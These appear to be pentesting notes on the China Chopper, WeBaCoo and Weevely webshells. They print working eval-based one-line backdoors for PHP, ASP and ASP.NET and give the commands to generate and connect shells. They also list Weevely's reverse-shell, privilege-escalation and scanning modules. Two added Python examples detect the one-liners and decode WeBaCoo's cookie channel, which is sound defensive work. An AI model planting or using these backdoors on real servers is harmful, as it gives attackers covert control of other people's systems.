I. China Chopper (中国菜刀)
1. The one-line webshell (一句话木马)
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request("pass")%>
ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
2. Upload the one-liner to the target
3. Connect to the webshell with China Chopper
4. China Chopper feature walkthrough
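The three one-liners above share one trait: a code-execution primitive (eval) fed directly from request data. The scanner below is an added defensive example, not part of China Chopper or of these notes; it turns that trait into three detection rules and runs them over a constructed sample tree made of the page's three one-liners plus two benign files. The rule names, the sample paths and the benign file contents are invented for the example.

```python
from __future__ import annotations

import re

# Each rule pairs a code-execution primitive with data read straight from the
# HTTP request; that pairing is the defining trait of the one-liners listed
# above and is what a file-upload or integrity scanner should surface for review.
WEBSHELL_RULES = {
    # PHP: eval/assert/system... fed from a request superglobal, optionally
    # behind the '@' error-suppression operator used in the page's sample.
    "php-eval-request": re.compile(
        r"@?\b(eval|assert|system|passthru|shell_exec|exec|popen)\s*\(\s*"
        r"\$_(POST|GET|REQUEST|COOKIE)\s*\[",
        re.IGNORECASE,
    ),
    # Classic ASP: eval request("param")
    "asp-eval-request": re.compile(r"\beval\s*\(?\s*request\s*\(", re.IGNORECASE),
    # ASP.NET JScript page: eval(Request.Item["param"], "unsafe")
    "aspx-eval-unsafe": re.compile(
        r"\beval\s*\(\s*Request\.Item\s*\[[^\]]*\]\s*,\s*['\"]unsafe['\"]\s*\)",
        re.IGNORECASE,
    ),
}


def scan_source(path: str, source: str) -> list[dict[str, object]]:
    """Return one finding per rule hit with the 1-based line number and the
    matched fragment, so an analyst can triage the file quickly."""
    findings: list[dict[str, object]] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule, pattern in WEBSHELL_RULES.items():
            match = pattern.search(line)
            if match:
                findings.append(
                    {"file": path, "line": lineno, "rule": rule, "match": match.group(0)}
                )
    return findings


def scan_files(files: dict[str, str]) -> dict[str, list[str]]:
    """Map each flagged path to the sorted rule names that fired; files with
    no hits are left out so the result doubles as an alert list."""
    hits: dict[str, list[str]] = {}
    for path, source in files.items():
        rules = sorted({str(f["rule"]) for f in scan_source(path, source)})
        if rules:
            hits[path] = rules
    return hits


# Constructed sample tree: the three one-liners from the page plus two benign
# files that touch request data or call eval without combining the two.
SAMPLE_FILES = {
    "upload/shell.php": "<?php @eval($_POST['pass']);?>",
    "upload/shell.asp": '<%eval request("pass")%>',
    "upload/shell.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "app/contact.php": "<?php echo htmlspecialchars($_POST['name']); ?>",
    "app/calc.js": "const v = eval('1 + 1');",
}

if __name__ == "__main__":
    for path, rules in scan_files(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(rules)}")
```

Run it over real files by passing a mapping of path to file content to scan_files; an upload directory that should never contain server-side code is the natural place to apply it. Treat every hit as a lead for manual review rather than an automatic verdict, since the primitives can also be split or obfuscated in ways three regular expressions do not cover.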
II. WeBaCoo (Web Backdoor Cookie)
1. Overview
- Terminal-like shell; PHP targets only
- The encoded traffic travels in the Cookie header, which makes it relatively stealthy
- Example request cookie: Cookie: cm=aWQ=; cn=M-cookie; cp=pMi~
  - cm: the command, base64-encoded
  - cn: the name of the cookie the server uses to return data
  - cp: the delimiter that brackets the returned data
2. Generate the server-side file
- webacoo -g -o webacoo.php
  -g          Generate backdoor code (-o is required)
  -o OUTPUT   Generated backdoor output filename
3. Upload it to the target
4. Connect to the webshell
- webacoo -t -u http://10.10.10.132/webacoo.php
  -t          Establish remote "terminal" connection (-u is required)
  -u URL      Backdoor URL
5. Capture and analyse the traffic (transport over cookies)
- Decoding the cookie values
- Other options
root@kali:~# webacoo -h
WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
Copyright (C) 2011-2012 Anestis Bechtsoudis
{ @anestisb | [email protected] | http(s)://bechtsoudis.com }

Usage: webacoo [options]

Options:
  -g            Generate backdoor code (-o is required)
  -f FUNCTION   PHP System function to use
                FUNCTION
                  1: system (default)
                  2: shell_exec
                  3: exec
                  4: passthru
                  5: popen
  -o OUTPUT     Generated backdoor output filename
  -r            Return un-obfuscated backdoor code
  -t            Establish remote "terminal" connection (-u is required)
  -u URL        Backdoor URL
  -e CMD        Single command execution mode (-t and -u are required)
  -m METHOD     HTTP method to be used (default is GET)
  -c C_NAME     Cookie name (default: "M-cookie")
  -d DELIM      Delimiter (default: New random for each request)
  -a AGENT      HTTP header user-agent (default exist)
  -p PROXY      Use proxy (tor, ip:port or user:pass:ip:port)
  -v LEVEL      Verbose level
                LEVEL
                  0: no additional info (default)
                  1: print HTTP headers
                  2: print HTTP headers + data
  -l LOG        Log activity to file
  -h            Display help and exit
  update        Check for updates and apply if any
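Because the command travels base64-encoded in the cm cookie and the reply comes back in the cookie named by cn, a reverse proxy or WAF that logs Cookie and Set-Cookie headers can decode this channel, which is the decoding step in section 5 done in code. The script below is an added detection example, not WeBaCoo's own code: it keys on the fixed cookie names cm/cn/cp from the overview (the cookie name set with -c and the per-request delimiter from -d vary, so it never matches on their values) and recovers the plaintext command; aWQ= decodes to id. The sample requests are constructed, and the framing of the reply (delimiter, base64 output, delimiter) is an assumption made for this example, not something the help text states.

```python
from __future__ import annotations

import base64
import binascii
import string

# Cookie names from the request shown in the overview: cm carries the command,
# cn names the cookie the server answers in, cp carries the delimiter.  The
# values of cn and cp are configurable (-c) or change per request (-d), so the
# detector keys on the fixed trio of names and on the base64-decodable command.
COMMAND_COOKIE = "cm"
RESPONSE_NAME_COOKIE = "cn"
DELIMITER_COOKIE = "cp"


def parse_cookie_header(header: str) -> dict[str, str]:
    """Split 'a=1; b=2' into a dict; fragments without '=' are skipped."""
    cookies: dict[str, str] = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name] = value
    return cookies


def _b64_text(value: str) -> str | None:
    """Return the decoded value when it is strict base64 holding printable text."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and all(c in string.printable for c in text) else None


def decode_request(cookie_header: str) -> dict[str, str] | None:
    """Flag a request whose cookies match the command channel and recover the
    plaintext command; None means the header does not fit the pattern."""
    cookies = parse_cookie_header(cookie_header)
    if not {COMMAND_COOKIE, RESPONSE_NAME_COOKIE, DELIMITER_COOKIE} <= set(cookies):
        return None
    command = _b64_text(cookies[COMMAND_COOKIE])
    if command is None:
        return None
    return {
        "command": command,
        "response_cookie": cookies[RESPONSE_NAME_COOKIE],
        "delimiter": cookies[DELIMITER_COOKIE],
    }


def decode_response(set_cookie_header: str, channel: dict[str, str]) -> str | None:
    """Recover command output from the reply.  The page says output returns in
    the cookie named by cn, bracketed by the cp delimiter; that the payload
    between the delimiters is base64 is an assumption made for this example."""
    value = parse_cookie_header(set_cookie_header).get(channel["response_cookie"])
    delim = channel["delimiter"]
    if value is None or len(value) <= 2 * len(delim):
        return None
    if not (value.startswith(delim) and value.endswith(delim)):
        return None
    return _b64_text(value[len(delim):-len(delim)])


# Constructed sample traffic: the cookie from the page (cm decodes to "id"),
# a decoy with matching names but a non-base64 value, and a benign session.
SAMPLE_REQUESTS = [
    "cm=aWQ=; cn=M-cookie; cp=pMi~",
    "cm=hello world; cn=M-cookie; cp=pMi~",
    "PHPSESSID=3f1c9a; theme=dark",
]
# Constructed reply for the first request, built to the framing assumed above.
SAMPLE_SET_COOKIE = (
    "M-cookie=pMi~" + base64.b64encode(b"uid=33(www-data)\n").decode() + "pMi~; path=/"
)


def triage(requests: list[str]) -> list[dict[str, str]]:
    """Return the decoded channel for every request that matches the pattern."""
    return [found for found in map(decode_request, requests) if found]


if __name__ == "__main__":
    for channel in triage(SAMPLE_REQUESTS):
        output = decode_response(SAMPLE_SET_COOKIE, channel)
        print("command:", channel["command"], "| output:", repr(output))
```

In practice the three-name match is the high-confidence signal; the base64 check only filters out accidental name collisions. Since a default web server access log does not record cookies, this logic belongs at a proxy, WAF or full-packet capture point, and a hit should be paired with a file scan of the web root for the PHP file that answers such requests.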
III. Weevely
1. Overview
A stealthy terminal-style PHP webshell; PHP targets only
More than 30 management modules:
- Execute system commands
- Check the server for common misconfigurations
- Open forward and reverse TCP shell connections
- Proxy HTTP traffic through the target host
- Run port scans from the target host to reach into the internal network
Supports a connection password
2. Generate the webshell and upload it
3. Connect to the webshell
4. help lists all modules
:audit_filesystem Audit system files for wrong permissions.
:audit_phpconf Audit PHP configuration.
:audit_etcpasswd Get /etc/passwd with different techniques.
:audit_suidsgid Find files with SUID or SGID flags.
:shell_su Elevate privileges with su command.
:shell_php Execute PHP commands.
:shell_sh Execute Shell commands.
:system_extensions Collect PHP and webserver extension list.
:system_info Collect system information.
:backdoor_reversetcp Execute a reverse TCP shell.
:backdoor_tcp Spawn a shell on a TCP port.
:bruteforce_sql Bruteforce SQL database.
:file_webdownload Download URL to the filesystem
:file_download Download file to remote filesystem.
:file_rm Remove remote file.
:file_upload Upload file to remote filesystem.
:file_grep Print lines matching a pattern in multiple files.
:file_bzip2 Compress or expand bzip2 files.
:file_cp Copy single file.
:file_tar Compress or expand tar archives.
:file_cd Change current working directory.
:file_zip Compress or expand zip files.
:file_ls List directory content.
:file_gzip Compress or expand gzip files.
:file_upload2web Upload file automatically to a web folder and get corresponding URL.
:file_edit Edit remote file on a local editor.
:file_read Read remote file from the remote filesystem.
:file_touch Change file timestamp.
:file_check Get remote file information.
:file_find Find files with given names and attributes.
:file_mount Mount remote filesystem using HTTPfs.
:file_enum Check existence and permissions of a list of paths.
:sql_dump Multi dbms mysqldump replacement.
:sql_console Execute SQL query or run console.
:net_ifconfig Get network interfaces addresses.
:net_scan TCP Port scan.
:net_curl Perform a curl-like HTTP request.
:net_proxy Proxify local HTTP traffic passing through the target.
:net_phpproxy Install PHP proxy on the target.